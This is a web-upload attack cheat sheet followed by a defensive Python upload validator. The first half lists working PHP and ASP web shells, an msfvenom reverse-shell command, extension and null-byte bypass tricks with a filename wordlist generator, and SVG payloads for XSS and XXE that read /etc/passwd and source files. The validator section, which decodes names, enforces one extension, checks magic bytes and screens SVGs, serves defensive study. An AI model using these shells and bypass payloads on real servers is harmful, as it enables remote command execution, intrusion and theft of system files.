# Web Shells
```bash
# Basic PHP File Read
<?php echo file_get_contents('/etc/passwd'); ?>
# Basic PHP Command Execution
<?php system('hostname'); ?>
# Basic PHP WebShell
<?php system($_REQUEST['cmd']); ?>
# Basic ASP WebShell
<% eval request('cmd') %>
# Generate PHP reverse shell
msfvenom -p php/reverse_php LHOST=<IP> LPORT=<PORT> -f raw > reverse.php
# phpbash
https://github.com/Arrexel/phpbash
# php reverse shell
https://github.com/pentestmonkey/php-reverse-shell
# seclists web/reverse shells
https://github.com/danielmiessler/SecLists/tree/master/Web-Shells
```
# Bypasses
```bash
# Client-Side Bypass
Toggle Page Inspector
# Blacklist Bypass
.phtml, pHp, php7, phar, etc.
# PHP extensions
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Upload%20Insecure%20Files/Extension%20PHP/extensions.lst
# ASP extensions
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/Extension%20ASP
# Web extensions
/usr/share/seclists/Discovery/Web-Content/web-extensions.txt
# Whitelist Bypass
## Double extension
shell.jpg.php
# Reverse double extension
shell.php.jpg
# Character Injection
`%20`, `%0a`, `%00`, `%0d0a`, `/`, `.\`, `.`, `…`, `:`
for char in '%20' '%0a' '%00' '%0d0a' '/' '.\\' '.' '…' ':'; do
for ext in '.php' '.phps'; do
echo "shell$char$ext.jpg" >> wordlist.txt
echo "shell$ext$char.jpg" >> wordlist.txt
echo "shell.jpg$char$ext" >> wordlist.txt
echo "shell.jpg$ext$char" >> wordlist.txt
done
done
# Content-Type Bypass
## List of All Content Types
https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/web-all-content-types.txt
grep 'image/' web-all-content-types.txt > image-content-types.txt
# File Signatures / Magic Bytes
https://en.wikipedia.org/wiki/List_of_file_signatures
```
# Limited Uploads
```bash
XSS
- HTML, JS, SVG, GIF
XXE/SSRF
- XML, SVG, PDF, PPT, DOC
# payload 1
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg xmlns="http://www.w3.org/2000/svg" version="1.1" width="1" height="1">
<rect x="1" y="1" width="1" height="1" fill="green" stroke="black" />
<script type="text/javascript">alert(window.origin);</script>
</svg>
# payload 2
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<svg>&xxe;</svg>
# payload 3
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]>
<svg>&xxe;</svg>
DoS
- ZIP, JPG, PNG
```
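Added defensive counterpart to the Bypasses list and the SVG payloads under Limited Uploads (example code, not part of the original cheat sheet): a Python upload validator that applies the check defeating each listed technique, namely percent-decoding the name before rejecting injected characters, allowing exactly one extension, deciding the file type by magic bytes rather than the client's Content-Type, and refusing SVGs that carry a DTD, entity or script. The allow-list, signatures and messages are constructed assumptions.

```python
import re
from urllib.parse import unquote

# Constructed allow-list: extension -> (expected Content-Type, accepted magic-byte prefixes).
ALLOWED = {
    "jpg": ("image/jpeg", (b"\xff\xd8\xff",)),
    "png": ("image/png", (b"\x89PNG\r\n\x1a\n",)),
    "gif": ("image/gif", (b"GIF87a", b"GIF89a")),
    "svg": ("image/svg+xml", (b"<?xml", b"<svg")),
}

# The injection characters from the wordlist above, matched after percent-decoding:
# NUL and other control bytes, whitespace (%20, %0a, %0d0a), path separators and colon.
BAD_CHARS = re.compile(r"[\x00-\x1f\x7f\s/\\:]")

# Coarse screen for the SVG payloads above (inline script, event handlers, DTD/entities).
# It is a reject filter, not a sanitizer: anything it flags is refused, never cleaned.
SVG_DANGER = re.compile(rb"<!DOCTYPE|<!ENTITY|<script|\bon\w+\s*=|javascript:", re.I)


def validate_upload(filename: str, content_type: str, data: bytes) -> tuple:
    """Return (accepted, reason-or-safe-name). Nothing here trusts the client's Content-Type."""
    name = unquote(filename)  # shell.php%00.jpg becomes shell.php\x00.jpg before any check
    if BAD_CHARS.search(name):
        return False, "forbidden character in filename"
    parts = name.split(".")
    # Exactly one non-empty extension: rejects shell.jpg.php, shell.php.jpg and trailing dots.
    if len(parts) != 2 or not parts[0] or not parts[1]:
        return False, "filename must be <name>.<ext> with exactly one dot"
    ext = parts[1].lower()  # pHp, PHP7 etc. are normalised before the allow-list lookup
    if ext not in ALLOWED:
        return False, f"extension .{ext} not allowed"
    mime, magics = ALLOWED[ext]
    if content_type.split(";")[0].strip().lower() != mime:
        return False, "Content-Type does not match extension"
    # Magic bytes decide the real type; a PHP file renamed to .jpg fails here.
    if not any(data.lstrip().startswith(m) for m in magics):
        return False, "file signature does not match extension"
    if ext == "svg" and SVG_DANGER.search(data):
        return False, "SVG contains script, event handler or DTD"
    return True, f"{parts[0]}.{ext}"  # store under the normalised name, never the raw one
```

Serving accepted files from a separate origin or with `Content-Disposition: attachment` limits the impact of anything the screen still misses.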